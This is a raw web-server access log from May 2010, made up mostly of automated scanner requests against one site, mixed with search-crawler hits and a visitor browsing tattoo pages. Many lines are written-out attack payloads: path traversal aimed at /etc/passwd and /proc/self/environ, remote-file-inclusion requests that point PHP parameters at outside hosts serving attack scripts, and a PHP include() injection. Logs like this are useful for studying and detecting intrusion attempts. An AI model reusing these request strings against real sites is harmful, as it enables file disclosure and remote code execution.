66.219.23.100 - - [23/May/2010:00:05:14 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
66.219.23.100 - - [23/May/2010:00:05:14 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
208.113.240.35 - - [23/May/2010:00:08:26 -0500] "GET /index1.php?dat=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.113.240.35 - - [23/May/2010:00:08:26 -0500] "GET /logs/index1.php?dat=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.113.240.35 - - [23/May/2010:00:08:26 -0500] "GET /logs/access_log.1264118400/index1.php?dat=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.113.240.35 - - [23/May/2010:00:08:38 -0500] "GET /logs/access_log.1271721600/index1.php?dat=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.94 - - [23/May/2010:00:09:33 -0500] "GET /logs/access_log.1252454400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [23/May/2010:00:09:39 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:09:39 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:10:04 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:10:36 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:10:36 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:10:37 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.167.140.113 - - [23/May/2010:00:11:26 -0500] "GET //bbs//////delete_comment.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
81.21.79.214 - - [23/May/2010:00:13:52 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:13:52 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:00:13:52 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.195.224 - - [23/May/2010:00:15:03 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.240.36.36 - - [23/May/2010:00:15:06 -0500] "GET /logs/access_log.1264032000//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
219.240.36.36 - - [23/May/2010:00:15:06 -0500] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
219.240.36.36 - - [23/May/2010:00:15:06 -0500] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:00:16:33 -0500] "GET //bbs//////delete_comment.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.79"
207.46.13.54 - - [23/May/2010:00:17:33 -0500] "GET /logs/access_log.1164758400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.59.218 - - [23/May/2010:00:18:07 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:00:18:07 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
70.38.71.147 - - [23/May/2010:00:18:10 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
70.38.71.147 - - [23/May/2010:00:18:10 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
207.46.199.199 - - [23/May/2010:00:21:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.98.216.61 - - [23/May/2010:00:22:46 -0500] "GET /logs//index.php?option=com_com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [23/May/2010:00:22:46 -0500] "GET //index.php?option=com_com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [23/May/2010:00:22:58 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [23/May/2010:00:22:58 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [23/May/2010:00:24:56 -0500] "GET /logs/access_log.1176508800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.98.216.61 - - [23/May/2010:00:25:03 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [23/May/2010:00:25:03 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.73.226.100 - - [23/May/2010:00:25:46 -0500] "GET //bbs///skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:00:25:46 -0500] "GET /logs/access_log.1263081600//bbs///skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:00:25:46 -0500] "GET /logs//bbs///skin/ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.195.112.180 - - [23/May/2010:00:26:06 -0500] "GET /?D=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [23/May/2010:00:26:31 -0500] "GET /logs/access_log.1271289600 HTTP/1.0" 200 669492 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.233 - - [23/May/2010:00:31:02 -0500] "GET /logs/access_log.1175472000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.33.99.205 - - [23/May/2010:00:33:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tattoos.lovetoknow.com/Art_Designs""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; OptusIE55-31; GTB6.4)"
110.33.99.205 - - [23/May/2010:00:33:04 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; OptusIE55-31; GTB6.4)"
110.33.99.205 - - [23/May/2010:00:33:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; OptusIE55-31; GTB6.4)"
88.191.94.188 - - [23/May/2010:00:33:27 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:00:33:27 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:00:33:27 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.98.216.61 - - [23/May/2010:00:33:32 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [23/May/2010:00:33:32 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
198.161.91.4 - - [23/May/2010:00:33:59 -0500] "GET //modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
198.161.91.4 - - [23/May/2010:00:33:59 -0500] "GET /logs//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
198.161.91.4 - - [23/May/2010:00:33:59 -0500] "GET /logs/access_log.1262822400//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
198.161.91.4 - - [23/May/2010:00:33:59 -0500] "GET /logs/access_log.1271548800//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:00:35:24 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [23/May/2010:00:35:42 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:00:35:42 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:00:35:42 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
208.80.193.39 - - [23/May/2010:00:39:33 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; ZangoToolbar 4.8.2)"
88.191.94.188 - - [23/May/2010:00:41:17 -0500] "GET /logs/access_log.1272844800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.163.148.130 - - [23/May/2010:00:41:19 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:00:41:19 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [23/May/2010:00:43:28 -0500] "GET /logs/access_log.1272844800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:00:46:28 -0500] "GET /logs/index2.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:00:46:29 -0500] "GET /index2.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:00:46:58 -0500] "GET /logs/index2.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:00:46:58 -0500] "GET /index2.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.30.142.216 - - [23/May/2010:00:51:38 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [23/May/2010:00:51:39 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.236.37.218 - - [23/May/2010:00:57:41 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:00:57:41 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:00:59:29 -0500] "GET /logs/index2.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:00:59:30 -0500] "GET /index2.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.96.218.85 - - [23/May/2010:01:00:51 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:01:00:51 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
216.7.185.19 - - [23/May/2010:01:01:25 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [23/May/2010:01:01:25 -0500] "GET /index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.126.254.162 - - [23/May/2010:01:01:37 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.76"
209.126.254.162 - - [23/May/2010:01:01:37 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
216.7.185.19 - - [23/May/2010:01:01:38 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [23/May/2010:01:01:39 -0500] "GET /index.php?option=com_bayesiannaivefilter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.126.254.162 - - [23/May/2010:01:04:50 -0500] "GET /logs/access_log.1273017600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
209.126.254.162 - - [23/May/2010:01:04:51 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
209.126.254.162 - - [23/May/2010:01:04:51 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.76"
66.96.218.85 - - [23/May/2010:01:06:26 -0500] "GET /logs/access_log.1273017600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:01:06:26 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:01:06:27 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
219.240.36.36 - - [23/May/2010:01:06:47 -0500] "GET //includes/functions_portal.php?phpbb_root_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
219.240.36.36 - - [23/May/2010:01:06:47 -0500] "GET /logs/access_log.1271548800//includes/functions_portal.php?phpbb_root_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
219.240.36.36 - - [23/May/2010:01:06:47 -0500] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:01:08:36 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
211.239.161.143 - - [23/May/2010:01:08:37 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
174.133.201.194 - - [23/May/2010:01:11:59 -0500] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:01:11:59 -0500] "GET //admin.joomlaradiov5.php?mosConfig_live_site=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:01:12:00 -0500] "GET /logs/access_log.1271548800//admin.joomlaradiov5.php?mosConfig_live_site=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:01:12:38 -0500] "GET ////bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:01:12:38 -0500] "GET /logs/access_log.1271548800////bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:01:12:38 -0500] "GET /logs////bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:01:13:06 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.240.234.25 - - [23/May/2010:01:13:28 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.825"
66.240.234.25 - - [23/May/2010:01:13:28 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.825"
66.240.234.25 - - [23/May/2010:01:13:28 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.825"
66.240.234.25 - - [23/May/2010:01:13:28 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.825"
66.240.234.25 - - [23/May/2010:01:13:28 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.825"
66.240.234.25 - - [23/May/2010:01:13:28 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.825"
94.30.220.16 - - [23/May/2010:01:13:36 -0500] "GET //admin.joomlaradiov5.php?mosConfig_live_site=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
94.30.220.16 - - [23/May/2010:01:13:36 -0500] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
94.30.220.16 - - [23/May/2010:01:13:36 -0500] "GET /logs/access_log.1270598400//admin.joomlaradiov5.php?mosConfig_live_site=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.30.220.16 - - [23/May/2010:01:13:50 -0500] "GET /logs/access_log.1262563200//admin.joomlaradiov5.php?mosConfig_live_site=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.163.148.130 - - [23/May/2010:01:15:22 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:01:15:22 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.13.98 - - [23/May/2010:01:21:03 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [23/May/2010:01:21:03 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:01:21:04 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.16.194.154 - - [23/May/2010:01:21:25 -0500] "GET /logs/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
69.16.194.154 - - [23/May/2010:01:21:25 -0500] "GET /logs/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
69.16.194.154 - - [23/May/2010:01:21:27 -0500] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
69.16.194.154 - - [23/May/2010:01:21:27 -0500] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
207.46.13.89 - - [23/May/2010:01:21:33 -0500] "GET /logs/access_log.1184457600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [23/May/2010:01:23:59 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:01:23:59 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:01:24:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:01:24:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.249.65.51 - - [23/May/2010:01:24:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.65.51 - - [23/May/2010:01:24:20 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
67.195.112.180 - - [23/May/2010:01:31:22 -0500] "GET /logs/access_log.1184630400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.2 - - [23/May/2010:01:32:57 -0500] "GET /logs/access_log.1264982400//includes/functions_mod_user.php?phpbb_root_path=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.221.130.2 - - [23/May/2010:01:32:57 -0500] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.2 - - [23/May/2010:01:32:57 -0500] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.221.130.2 - - [23/May/2010:01:34:05 -0500] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.221.130.2 - - [23/May/2010:01:34:05 -0500] "GET /logs/access_log.1264982400//includes/functions_mod_user.php?phpbb_root_path=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.221.130.2 - - [23/May/2010:01:34:05 -0500] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.vitalhit.ru//img/sites/2009/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.181.7.100 - - [23/May/2010:01:34:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
